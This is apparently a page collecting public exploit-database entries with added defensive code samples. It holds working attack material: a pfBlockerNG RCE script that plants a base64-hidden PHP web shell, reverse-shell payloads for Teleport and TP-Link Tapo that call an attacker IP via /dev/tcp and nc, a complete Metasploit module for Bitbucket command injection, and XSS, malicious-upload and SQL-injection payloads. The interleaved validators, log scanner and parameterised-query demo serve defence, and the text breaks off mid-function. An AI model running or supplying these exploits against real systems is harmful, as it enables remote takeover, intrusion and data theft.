<pre><code>#!/usr/bin/env python3
# Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/

import argparse
import requests
import time
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

parser = argparse.ArgumentParser(description="pfBlockerNG <= 2.1.4_26 Unauth RCE")
parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: https://192.168.1.111:443/")
args = parser.parse_args()

url = args.url
shell_filename = "system_advanced_control.php"

def check_endpoint(url):
    response = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)
    if response.status_code == 200:
        print("[+] pfBlockerNG is installed")
    else:
        print("\n[-] pfBlockerNG not installed")
        sys.exit()

def upload_shell(url, shell_filename):
    payload = {"Host":"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '"}
    print("[/] Uploading shell...")
    response = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)
    time.sleep(2)
    response = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)
    if ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):
        print("[+] Upload succeeded")
    else:
        print("\n[-] Error uploading shell. Probably patched ", response.content)
        sys.exit()

def interactive_shell(url, shell_filename, cmd):
    response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)
    print(str(response.text)+"\n")


def delete_shell(url, shell_filename):
    delcmd = "rm /usr/local/www/system_advanced_control.php"
    response = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)
    print("\n[+] Shell deleted")

check_endpoint(url)
upload_shell(url, shell_filename)
try:
    while True:
        cmd = input("# ")
        interactive_shell(url, shell_filename, cmd)
except:
    delete_shell(url, shell_filename)
</code></pre>
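The exploit above reaches the system through the HTTP Host header, which the affected pfBlockerNG version passed into a shell command without validation. The validator below is an added example written for this page; it is not code from the advisory or from pfBlockerNG, and the function and constant names are my own. It accepts only what a Host header may legitimately carry (an RFC 1123 hostname, an IPv4 literal, or a bracketed IPv6 literal, each with an optional port) and returns None for anything else, so quotes, spaces, globbing characters and shell metacharacters such as the `' *;` sequence above are rejected before the value can reach any downstream command.

```python
import ipaddress
import re

# RFC 1123 hostname label: 1-63 alphanumerics or hyphens, no leading/trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def parse_host_header(value):
    """Return (host, port_or_None) for a syntactically valid Host header, else None.

    Only an RFC 1123 hostname, an IPv4 literal or a bracketed IPv6 literal,
    each optionally followed by ':port', is accepted. Everything else (quotes,
    spaces, globbing characters, shell metacharacters) is rejected.
    """
    if not value or len(value) > 255:
        return None

    if value.startswith("["):
        # Bracketed IPv6 literal, e.g. "[::1]:8443"
        end = value.find("]")
        if end == -1:
            return None
        host, rest = value[1:end], value[end + 1:]
        if not _is_ipv6(host):
            return None
        if rest and not rest.startswith(":"):
            return None
        port = rest[1:] if rest else None
    else:
        if value.count(":") > 1:
            return None  # an unbracketed IPv6 literal is not valid in Host
        host, sep, port = value.partition(":")
        if not sep:
            port = None
        if not _is_hostname_or_ipv4(host):
            return None

    if port is not None:
        if not (port.isascii() and port.isdigit()) or not 1 <= int(port) <= 65535:
            return None
        port = int(port)
    return host.lower(), port


def _is_ipv6(text):
    try:
        ipaddress.IPv6Address(text)
        return True
    except ValueError:
        return False


def _is_hostname_or_ipv4(host):
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.IPv4Address(host)
        return True
    except ValueError:
        pass
    return all(_LABEL.match(label) for label in host.rstrip(".").split("."))


# Constructed sample values (not captured traffic): two benign Host headers and
# the shape of the metacharacter-laden header the exploit above relies on.
SAMPLE_HEADERS = [
    "192.168.1.111:443",
    "pfsense.example.internal",
    "' *; echo x; '",
]

if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        print(repr(header), "->", parse_host_header(header))
```

Any request whose Host header fails this parse should be answered with a 400 and logged; a web application should never need the raw header value for anything other than virtual-host selection, and that selection should compare against a fixed allowlist of expected names.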
<pre><code># Exploit Title: WordPress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/
# Date: 2022-08-24
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: https://profiles.wordpress.org/3dady/
# Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip
# Category: Web Application
# Version: 1.0
# Tested on: Debian / WordPress 6.0.1
# CVE : N/A

# 1. Technical Description:
The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS, specifically in the
dady_input_text and dady2_input_text fields: the user's input is not properly sanitized, which allows
JavaScript code to be stored in the setting and executed later.

# 2. Proof of Concept (PoC):
 a. Install and activate version 1.0 of the plugin.
 b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady).
 c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text):
    " autofocus onfocus=alert(/XSS/)>
 d. Save the changes; the popup window demonstrating the vulnerability (PoC) is executed immediately.

 Note: This change will be permanent until you modify the edited fields.

</code></pre>
<pre><code># Exploit Title: WordPress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/wp-useronline/
# Date: 2022-08-24
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: https://github.com/lesterchan/wp-useronline
# Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
# Category: Web Application
# Version: 2.88.0
# Tested on: Debian / WordPress 6.0.1
# CVE : CVE-2022-2941
# Reference: https://github.com/lesterchan/wp-useronline/commit/59c76b20e4e27489f93dee4ef1254d6204e08b3c

# 1. Technical Description:
The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions
up to, and including, 2.88.0. None of the fields in the "Naming Conventions" section sanitize user input,
nor escape it on output. This makes it possible for authenticated attackers with administrative privileges
to inject JavaScript code into the setting that will execute whenever a user accesses the injected page.

# 2. Proof of Concept (PoC):
 a. Install and activate version 2.88.0 of the plugin.
 b. Go to the plugin options panel (http://[TARGET]/wp-admin/options-general.php?page=useronline-settings).
 c. Identify the "Naming Conventions" section and type your payload in any of the existing fields. You can use
    the following payload:
    <script>alert(/XSS/)</script>
 d. Save the changes and go to the Dashboard/WP-UserOnline option. As soon as you click it, your payload
    will be executed.

Note: This change will be permanent until you modify the edited fields.

</code></pre>
<pre><code># Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)
# Date: 08/01/2022
# Exploit Author: Brandon Roach & Brian Landrum
# Vendor Homepage: https://goteleport.com
# Software Link: https://github.com/gravitational/teleport
# Version: < 10.1.2
# Tested on: Linux
# CVE: CVE-2022-36633

Proof of Concept (payload):
https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%30%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?method=iam


Decoded payload:
"
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #

</code></pre>
<pre><code># Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 22-08-2022
# Exploit Author: yuyudhn
# Vendor Homepage: https://feehi.com/
# Software Link: https://github.com/liufee/cms
# Version: 2.1.1 (REQUIRED)
# Tested on: Linux, Docker
# CVE : CVE-2022-34140


# Proof of Concept:
1. Log in with an admin account at http://feehi-cms.local/admin
2. Go to the Ad Management menu: http://feehi-cms.local/admin/index.php?r=ad%2Findex
3. Create a new Ad: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
4. Upload a PHP script with a jpg/png extension and, using Burp Suite or any tamper-data browser add-on, change the extension back to php.
5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php

# Burp request example:

POST /admin/index.php?r=ad%2Fcreate HTTP/1.1
Host: feehi-cms.local
Content-Length: 1530
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://feehi-cms.local
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D
Connection: close

------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="_csrf_backend"

FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[name]"

rce
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[tips]"

rce at Ad management
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[input_type]"

1
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[ad]"


------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"
Content-Type: image/png

<?php phpinfo();

------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[link]"


--------------

</code></pre>
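The request above works because the server keeps the extension of the client-supplied filename (rewritten to .php in the proxy) and trusts the client's Content-Type of image/png. The validator below is an added example written for this page; it is not Feehi CMS code and does not reflect its schema or upload handler, and the allowlist, function names and sample bytes are constructed. It treats the filename and Content-Type as hints only, checks the file's leading magic bytes against the extension, refuses anything containing a PHP open tag, and generates the stored name itself so the client can never choose the extension the web server will execute.

```python
import os
import secrets

# Image types accepted for ad uploads: extension -> leading magic bytes.
# Constructed allowlist for this example; extend it per deployment.
ALLOWED_IMAGES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


class UploadRejected(ValueError):
    """Raised with a reason when an upload fails validation."""


def validate_image_upload(client_filename, client_content_type, data):
    """Validate an uploaded image and return a server-generated storage name.

    The client-supplied filename and Content-Type are hints only. The stored
    name is generated here, so a filename rewritten in an intercepting proxy
    (asuka.php sent as image/png, as in the request above) cannot pick the
    extension the web server decides to execute.
    """
    _, ext = os.path.splitext(client_filename)
    ext = ext.lstrip(".").lower()
    if ext not in ALLOWED_IMAGES:
        raise UploadRejected("extension %r is not an allowed image type" % ext)
    if not client_content_type.lower().startswith("image/"):
        raise UploadRejected("unexpected Content-Type %r" % client_content_type)
    if not any(data.startswith(magic) for magic in ALLOWED_IMAGES[ext]):
        raise UploadRejected("content does not start with a %s signature" % ext)
    # Defence in depth against image/PHP polyglots: a genuine image has no
    # reason to contain a PHP open tag anywhere in its bytes.
    if b"<?php" in data:
        raise UploadRejected("PHP open tag found inside image data")
    return "%s.%s" % (secrets.token_hex(16), ext)


def upload_decision(client_filename, client_content_type, data):
    """Convenience wrapper returning (accepted, stored_name_or_reason)."""
    try:
        return True, validate_image_upload(client_filename, client_content_type, data)
    except UploadRejected as exc:
        return False, str(exc)


# Constructed sample payloads (not real files): a minimal PNG header, and the
# PHP body from the request above.
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_BODY = b"<?php phpinfo();"

if __name__ == "__main__":
    print(upload_decision("photo.png", "image/png", PNG_HEADER))
    print(upload_decision("asuka.php", "image/png", PHP_BODY))
    print(upload_decision("asuka.png", "image/png", PHP_BODY))
```

Validation alone is not the whole fix: the upload directory should also be served without script execution (no PHP handler for it) and ideally live outside the web root, so that a file which slips past the checks is still only ever returned as static data.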
<pre><code># Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
# Date: 28/08/2022
# Exploit Author: Ashkan Moghaddas
# Vendor Homepage: https://testa.cc
# Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip
# Version: 3.5.1
# Tested on: Windows/Linux

# Proof of Concept:
# 1- Install Testa 3.5.1
# 2- Go to https://localhost.com/login.php?redirect=XXXX
# 3- Replace XXXX in the address bar with the XSS payload: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
# 4- The XSS is triggered.

# Or go directly to this URL:
https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
# The XSS will trigger.
</code></pre>
<pre><code># Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
# Date: 02/11/2022
# Exploit Author: hacefresko
# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/
# Version: 1.1.15 and below
# Tested on: 1.1.11, 1.1.14 and 1.1.15
# CVE : CVE-2021-4045

# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce

import requests, urllib3, sys, threading, os
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

PORT = 1337
REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'
NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version)

if len(sys.argv) < 3:
    print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>")
    exit()

victim = sys.argv[1]
attacker = sys.argv[2]

print("[+] Listening on %d" % PORT)
t = threading.Thread(target=os.system, args=(NC_COMMAND,))
t.start()

print("[+] Serving payload to %s\n" % victim)
url = "https://" + victim + ":443/"
json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}
requests.post(url, json=json, verify=False)

</code></pre>
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Bitbucket Git Command Injection',
        'Description' => %q{
          Various versions of Bitbucket Server and Data Center are vulnerable to
          an unauthenticated command injection vulnerability in multiple API endpoints.

          The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint
          creates an archive of the repository, leveraging the `git-archive` command to do so.
          Supplying NULL bytes to the request enables the passing of additional arguments to the
          command, ultimately enabling execution of arbitrary commands.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'TheGrandPew', # discovery
          'Ron Bowes', # analysis and PoC
          'Jang', # testanull - PoC
          'Shelby Pace' # Metasploit module
        ],
        'References' => [
          [ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ],
          [ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ],
          [ 'CVE', '2022-36804' ]
        ],
        'Platform' => [ 'linux' ],
        'Privileged' => false,
        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
        'Targets' => [
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Type' => :linux_dropper,
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'CmdStagerFlavor' => %w[wget curl bourne],
              'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Type' => :unix_cmd,
              'Arch' => ARCH_CMD,
              'Payload' => { 'BadChars' => %(:/?#[]@) },
              'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' }
            }
          ]
        ],
        'DisclosureDate' => '2022-08-24',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'Reliability' => [ IOC_IN_LOGS ],
          'SideEffects' => [ REPEATABLE_SESSION ]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(7990),
        OptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']),
        OptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]),
        OptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ])
      ]
    )
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'keep_cookies' => true,
      'uri' => normalize_uri(target_uri.path, 'login')
    )

    return CheckCode::Unknown('Failed to receive response from application') unless res

    unless res.body.include?('Bitbucket')
      return CheckCode::Safe('Target does not appear to be Bitbucket')
    end

    footer = res.get_html_document&.at('footer')
    return CheckCode::Detected('Cannot determine version of Bitbucket') unless footer

    version_str = footer.at('span')&.children&.text
    return CheckCode::Detected('Cannot find version string in footer') unless version_str

    matches = version_str.match(/v(\d+\.\d+\.\d+)/)
    return CheckCode::Detected('Version unknown') unless matches && matches.length > 1

    version_str = matches[1]
    vprint_status("Found Bitbucket version: #{matches[1]}")

    num_vers = Rex::Version.new(version_str)
    return CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17')

    major, minor, revision = version_str.split('.')
    case major
    when '6'
      return CheckCode::Appears
    when '7'
      case minor
      when '6'
        return CheckCode::Appears if revision.to_i < 17
      when '17'
        return CheckCode::Appears if revision.to_i < 10
      when '21'
        return CheckCode::Appears if revision.to_i < 4
      end
    when '8'
      case minor
      when '0', '1'
        return CheckCode::Appears if revision.to_i < 3
      when '2'
        return CheckCode::Appears if revision.to_i < 2
      when '3'
        return CheckCode::Appears if revision.to_i < 1
      end
    end

    CheckCode::Detected
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def authenticate
    print_status("Attempting to authenticate with user '#{username}' and password '#{password}'")
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'login'),
      'keep_cookies' => true
    )

    fail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login')
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'),
      'keep_cookies' => true,
      'vars_post' =>
      {
        'j_username' => username,
        'j_password' => password,
        'submit' => 'Log in'
      }
    )

    fail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'dashboard'),
      'keep_cookies' => true
    )

    fail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res

    unless res.body.include?('Your work') && res.body.include?('Projects')
      fail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid')
    end

    @authenticated = true
    print_good('Successfully logged into Bitbucket!')
  end

  def find_public_repo
    print_status('Searching Bitbucket for publicly accessible repository')
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'),
      'keep_cookies' => true
    )

    fail_with(Failure::Disconnected, 'Did not receive a response') unless res
    json_data = JSON.parse(res.body)
    fail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data

    unless json_data['size'] > 0
      fail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories')
    end

    # opt for public repos unless none exist.
    # Attempt to use a private repo if so
    repos = json_data['values']
    possible_repos = repos.select { |repo| repo['public'] == true }
    if possible_repos.empty? && @authenticated
      possible_repos = repos.select { |repo| repo['public'] == false }
    end

    fail_with(Failure::NotFound, 'There doesn\'t appear to be any repos to use') if possible_repos.empty?
    possible_repos.each do |repo|
      project = repo['project']
      next unless project

      @project = project['key']
      @repo = repo['slug']
      break if @project && @repo
    end

    fail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo
    print_good("Found public repo '#{@repo}' in project '#{@project}'!")
  end

  def execute_command(cmd, _opts = {})
    uri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive')
    send_request_cgi(
      'method' => 'GET',
      'uri' => uri,
      'keep_cookies' => true,
      'vars_get' =>
      {
        'format' => 'zip',
        'path' => Rex::Text.rand_text_alpha(2..5),
        'prefix' => "#{Rex::Text.rand_text_alpha(1..3)}\x00--exec=`#{cmd}`\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}"
      }
    )
  end

  def exploit
    @authenticated = false
    authenticate unless username.blank? && password.blank?
    find_public_repo

    if target['Type'] == :linux_dropper
      execute_cmdstager(linemax: 6000)
    else
      execute_command(payload.encoded)
    end
  end
end
</code></pre>
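Two defensive checks fall directly out of the module above: the version ranges its `check` method treats as affected, and the shape of the request `execute_command` sends (NUL bytes inside the `prefix` query parameter of the `/archive` endpoint, which show up as `%00` in web-server access logs). The code below is an added example written for this page, not code from the module, from Rapid7 or from Atlassian; the function names, the log format and the sample log lines are constructed, and matching numeric API prefixes besides `latest` is an assumption. `assess_version` mirrors the module's thresholds, including its conservative habit of reporting later releases of the listed branches as undetermined rather than fixed, and `scan_access_log` flags archive requests whose query parameters carry a NUL byte or an option-like leading `--`.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint the module targets. The page uses the 'latest' API prefix; matching
# numeric prefixes as well is an assumption for this example.
ARCHIVE_PATH = re.compile(
    r"^/rest/api/(?:latest|\d+\.\d+)/projects/[^/]+/repos/[^/]+/archive/?$"
)
# Request field of a combined-log-format line: "METHOD target HTTP/x.y"
REQUEST_FIELD = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Lowest fixed revision per branch, taken from the module's check method.
FIXED_REVISION = {7: {6: 17, 17: 10, 21: 4}, 8: {0: 3, 1: 3, 2: 2, 3: 1}}


def assess_version(version):
    """Classify a Bitbucket Server/DC version the way the module's check does.

    Returns 'not_vulnerable' for 6.10.17 and earlier, 'vulnerable' for later
    6.x releases and for listed 7.x/8.x branches below their fixed revision,
    and 'unknown' otherwise (the module answers Detected there, not NotVulnerable).
    """
    parts = tuple(int(p) for p in version.lstrip("v").split("."))
    if len(parts) != 3:
        raise ValueError("expected MAJOR.MINOR.REVISION, got %r" % version)
    if parts <= (6, 10, 17):
        return "not_vulnerable"
    major, minor, revision = parts
    if major == 6:
        return "vulnerable"
    fixed = FIXED_REVISION.get(major, {}).get(minor)
    if fixed is not None and revision < fixed:
        return "vulnerable"
    return "unknown"


def flag_archive_target(target):
    """Return a reason string if a request target matches the injection pattern, else None.

    parse_qs percent-decodes values, so an encoded %00 comes back as a real
    NUL character; that is what lets extra git-archive options through.
    """
    parts = urlsplit(target)
    if not ARCHIVE_PATH.match(parts.path):
        return None
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if "\x00" in value:
                return "NUL byte in query parameter %r" % name
            if value.startswith("--"):
                return "option-like value in query parameter %r" % name
    return None


def scan_access_log(lines):
    """Return [(line_number, reason)] for suspicious archive requests in log lines."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_FIELD.search(line)
        if not match:
            continue
        reason = flag_archive_target(match.group("target"))
        if reason:
            hits.append((number, reason))
    return hits


# Constructed sample log lines (not real traffic): a benign archive download,
# an injection attempt carrying an encoded NUL byte, and an unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Aug/2022:10:00:01 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?format=zip HTTP/1.1" 200 512',
    '10.0.0.9 - - [24/Aug/2022:10:00:07 +0000] "GET /rest/api/latest/projects/PROJ/repos/app/archive?format=zip&path=ab&prefix=x%00--exec=%60id%60%00--remote=abc HTTP/1.1" 500 0',
    '10.0.0.5 - - [24/Aug/2022:10:00:09 +0000] "GET /dashboard HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for version in ("6.10.17", "7.21.3", "8.3.1"):
        print(version, assess_version(version))
    for number, reason in scan_access_log(SAMPLE_LOG):
        print("line %d: %s" % (number, reason))
```

Because the module notes `IOC_IN_LOGS`, the access-log check is worth running retroactively as well as in a streaming detection; any hit against an instance that `assess_version` reports as vulnerable should be treated as a likely compromise rather than a scan.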
<pre><code># Exploit Title: WorkOrder CMS 0.1.0 Cross-Site Scripting (XSS)

# Date: Sep 22, 2022

# Exploit Author: Chokri Hammedi

# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS

# Software Link: https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip

# Version: 0.1.0

# Tested on: Linux


# Payload:

username:<u>test1337<script>alert('hi');</script>

password:<u>test1337<script>alert('hi');</script>
</code></pre>
<pre><code># Exploit Title: WorkOrder CMS 0.1.0 SQLI

# Date: Sep 22, 2022

# Exploit Author: Chokri Hammedi

# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS

# Software Link: https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip

# Version: 0.1.0

# Tested on: Linux


# Auth Bypass:

username:' or '1'='1

password:' or '1'='1


#sqlmap -r workorder.req --threads=10 --level 5 --risk 3 --dbs --dbms=mysql


# POST Requests:

Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: userName=1'='1&password=1/' AND (SELECT 3761 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(3761=3761,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UUhY!1111'/

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: userName=1'='1&password=1/';SELECT SLEEP(5)#!1111'/

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: userName=1'='1&password=1/' AND (SELECT 6822 FROM (SELECT(SLEEP(5)))lYsh)-- YlDI!1111'/

Parameter: #2* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: userName=1'='1&password=1/!1111' AND (SELECT 2010 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(2010=2010,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tqtn/

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: userName=1'='1&password=1/!1111';SELECT SLEEP(5)#/

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: userName=1'='1&password=1/!1111' OR SLEEP(5)-- XuTW/
</code></pre>
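The authentication bypass above (`' or '1'='1` in both fields) succeeds only when the login query is assembled by string concatenation, so the attacker's quotes rewrite the WHERE clause. The example below is added for this page and is not WorkOrder CMS code; it uses an in-memory SQLite table with one constructed account rather than the CMS's real schema, and shows the string-built query beside a parameterised one so the difference can be observed directly: the same bypass value returns a user from the first and nothing from the second.

```python
import sqlite3

BYPASS = "' or '1'='1"  # the auth-bypass value from the advisory above


def _demo_db():
    """In-memory users table with one constructed account (not WorkOrder's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userName TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery staple')")
    return conn


def login_vulnerable(conn, user_name, password):
    """String-built query: attacker-controlled quotes become part of the SQL.

    With BYPASS in both fields the statement reads
      ... WHERE userName='' or '1'='1' AND password='' or '1'='1'
    which is true for every row, so the first user comes back.
    """
    sql = "SELECT userName FROM users WHERE userName='%s' AND password='%s'" % (user_name, password)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterised(conn, user_name, password):
    """Bound parameters: the input is always data, never SQL, whatever it contains."""
    row = conn.execute(
        "SELECT userName FROM users WHERE userName=? AND password=?",
        (user_name, password),
    ).fetchone()
    return row[0] if row else None


def compare_logins():
    """Run both implementations against a valid login and the bypass value."""
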